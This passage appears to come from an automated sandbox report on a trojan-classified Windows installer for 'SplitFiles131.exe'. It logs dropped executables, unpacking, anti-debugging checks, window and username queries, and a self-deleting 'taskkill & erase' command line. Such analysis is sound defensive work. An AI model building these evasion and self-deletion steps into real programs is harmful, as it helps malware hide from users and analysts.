                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00410A50
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_0042AB9A
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00421C88
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_0042ACBA
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00447D2D
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00428D39
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00404F20
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_1000F670
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_1000EC61
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exeCode function: 6_2_0010AE8D
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: String function: 004035DC appears 90 times
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: String function: 00408CA0 appears 42 times
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: String function: 00403548 appears 61 times
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: String function: 00446194 appears 58 times
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: String function: 00445EC4 appears 43 times
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: String function: 004037CC appears 193 times
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: String function: 0043477C appears 32 times
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: String function: 00455D54 appears 48 times
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: String function: 00407988 appears 33 times
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: String function: 00455B64 appears 86 times
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: String function: 00451DE8 appears 62 times
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: String function: 00405A9C appears 92 times
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: String function: 10003C50 appears 34 times
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: String function: 0040F9E0 appears 54 times
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00423C4C NtdllDefWindowProc_A,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_004126A0 NtdllDefWindowProc_A,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00455514 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,
                Source: is-DTRND.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                Source: is-DTRND.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
                Source: is-DTRND.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Source: is-AGVDF.tmp.4.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                Source: is-AGVDF.tmp.4.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
                Source: is-AGVDF.tmp.4.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Source: file.exe, 00000001.00000000.288145958.0000000000417000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename" vs file.exe
                Source: file.exe, 00000001.00000003.289316432.00000000020FD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
                Source: file.exe, 00000001.00000003.289316432.00000000020FD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename6 vs file.exe
                Source: file.exe, 00000001.00000003.288963142.00000000022D9000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
                Source: file.exe, 00000001.00000003.288963142.00000000022D9000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename6 vs file.exe
                Source: file.exeBinary or memory string: OriginalFilename" vs file.exe
                Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Split Files\is-AGVDF.tmp 1E95FE5D06884DF82D2BEAEDA09434ECAC2A347AEC5F03E71F20E39FB6C9E0E9
                Source: SplitFiles131.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_SYSHEAP, IMAGE_SCN_MEM_PURGEABLE, IMAGE_SCN_MEM_16BIT, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp "C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp" /SL4 $902D6 "C:\Users\user\Desktop\file.exe" 1818498 170496
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess created: C:\Program Files (x86)\Split Files\SplitFiles131.exe "C:\Program Files (x86)\Split Files\SplitFiles131.exe"
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeProcess created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exe
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp "C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp" /SL4 $902D6 "C:\Users\user\Desktop\file.exe" 1818498 170496
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess created: C:\Program Files (x86)\Split Files\SplitFiles131.exe "C:\Program Files (x86)\Split Files\SplitFiles131.exe"
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeProcess created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exe
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040910C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6CF44E70,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00453D80 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6CF44E70,
                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;SplitFiles131.exe&quot;)
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeFile created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}Jump to behavior
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmpJump to behavior
                Source: classification engineClassification label: mal96.troj.evad.winEXE@12/39@0/5
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00401B30 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_004547A0 GetModuleHandleA,6CAD5550,GetDiskFreeSpaceA,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00405350 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,FindCloseChangeNotification,
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5272:120:WilError_01
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0040B090 FindResourceA,FreeResource,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpFile created: C:\Program Files (x86)\Split FilesJump to behavior
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCommand line argument: `a}{
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCommand line argument: MFE.
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCommand line argument: ZK]Z
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCommand line argument: ZK]Z
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpWindow found: window name: TMainForm
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: file.exeStatic file information: File size 2094367 > 1048576

                Data Obfuscation

                barindex
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeUnpacked PE file: 5.2.SplitFiles131.exe.400000.0.unpack
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeUnpacked PE file: 5.2.SplitFiles131.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R;.ave131:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00406594 push 004065D1h; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00404159 push eax; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00404229 push 00404435h; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004042AA push 00404435h; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00404327 push 00404435h; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00408BDC push 00408C0Fh; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040438C push 00404435h; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00407F3C push ecx; mov dword ptr [esp], eax
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00409A20 push 00409A5Dh; ret
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0040A107 push ds; ret
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_004302D0 push ecx; mov dword ptr [esp], eax
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_004063C0 push ecx; mov dword ptr [esp], eax
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_004785C8 push 00478673h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00410798 push ecx; mov dword ptr [esp], edx
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_004129F0 push 00412A53h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0045AA9C push ecx; mov dword ptr [esp], eax
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00450EB4 push 00450EE7h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0040D0F0 push ecx; mov dword ptr [esp], edx
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00443530 push ecx; mov dword ptr [esp], ecx
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_004055BD push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0040F650 push ecx; mov dword ptr [esp], edx
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0040568D push 00405899h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0040570E push 00405899h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_004057F0 push 00405899h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0040578B push 00405899h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00479B20 push ecx; mov dword ptr [esp], ecx
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00419CF0 push ecx; mov dword ptr [esp], ecx
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_004311AD push esi; ret
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_0040F4BB push ecx; ret
                Source: SplitFiles131.exe.4.drStatic PE information: section name: .ave131
                Source: initial sampleStatic PE information: section name: .text entropy: 7.2455087113234224
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpFile created: C:\Users\user\AppData\Local\Temp\is-D5FV2.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpFile created: C:\Users\user\AppData\Local\Temp\is-D5FV2.tmp\_iscrypt.dllJump to dropped file
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeFile created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpFile created: C:\Program Files (x86)\Split Files\SplitFiles131.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpFile created: C:\Program Files (x86)\Split Files\unins000.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpFile created: C:\Program Files (x86)\Split Files\is-AGVDF.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpFile created: C:\Users\user\AppData\Local\Temp\is-D5FV2.tmp\_isetup\_shfoldr.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00423CD4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00423CD4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00478118 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0042425C IsIconic,SetActiveWindow,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_004242A4 IsIconic,SetActiveWindow,SetFocus,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0041844C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00422924 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00417660 IsIconic,GetCapture,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00417D96 IsIconic,SetWindowPos,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00417D98 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
                Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe TID: 996Thread sleep count: 31 > 30
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodes
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-D5FV2.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpDropped PE file which has not been started: C:\Program Files (x86)\Split Files\unins000.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpDropped PE file which has not been started: C:\Program Files (x86)\Split Files\is-AGVDF.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-D5FV2.tmp\_isetup\_shfoldr.dllJump to dropped file
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exeAPI coverage: 9.8 %
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: __Init_thread_footer,GetUserNameA,GetUserNameA,__Init_thread_footer,GetUserNameA,__Init_thread_footer,GetUserNameA,GetForegroundWindow,GetWindowTextA,Sleep,Sleep,GetForegroundWindow,GetWindowTextA,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00409764 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0046CA68 FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00474A14 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0045157C FindFirstFileA,GetLastError,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0045E244 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0048AC5C FindFirstFileA,6CAD69D0,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00472CD4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0045CDA4 FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0045DEB0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00423E2D FindFirstFileExW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_1000959D FindFirstFileExW,
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exeCode function: 6_2_00104A1A FindFirstFileExW,
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00402F20 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,
                Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_0044028F mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_0042041F mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_004429E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00417BAF mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_100091C7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_10006CE1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exeCode function: 6_2_00105B47 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exeCode function: 6_2_001033EF mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_0040F789 SetUnhandledExceptionFilter,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
